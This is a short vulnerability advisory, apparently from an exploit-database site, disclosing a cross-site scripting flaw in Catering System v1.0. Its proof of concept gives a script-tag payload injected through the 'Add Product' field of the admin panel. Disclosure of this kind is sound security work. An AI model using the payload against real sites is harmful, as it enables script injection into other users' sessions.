Catering System v1.0 - XSS Vulnerabilities

2019.07.11
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#################################################################### # Exploit Title: Catering System v1.0 - XSS Vulnerabilities # Dork: N/A # Date: 11.07.2019 # Exploit Author: Muhammed Yasir Aztepe # Vendor Homepage:https://demo.phpjabbers.com/1562798478_148/index.php # Software Link:https://www.phpjabbers.com/catering-system/ # Version:v1.0 # Category: Webapps # Tested on: Windows # CVE: N/A #################################################################### # You can see the vulnerability by using the XSS code as specified in the poc section. # The proof of the deficit is in the link below. # https://i.hizliresim.com/6DPYoW.png # https://i.hizliresim.com/WXkWNL.png # https://i.hizliresim.com/EO8QGn.png #################################################################### # POC - XSS # Parameters : Add Product # Attack Pattern : <script ^__^>alert(String.fromCharCode(49))</script ^__^ # GET Request :https://demo.phpjabbers.com/1562798478_148/index.php?controller=pjAdminProducts&action=pjActionIndex ####################################################################

References:

https://youtu.be/rRTzDJ2vBpE


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top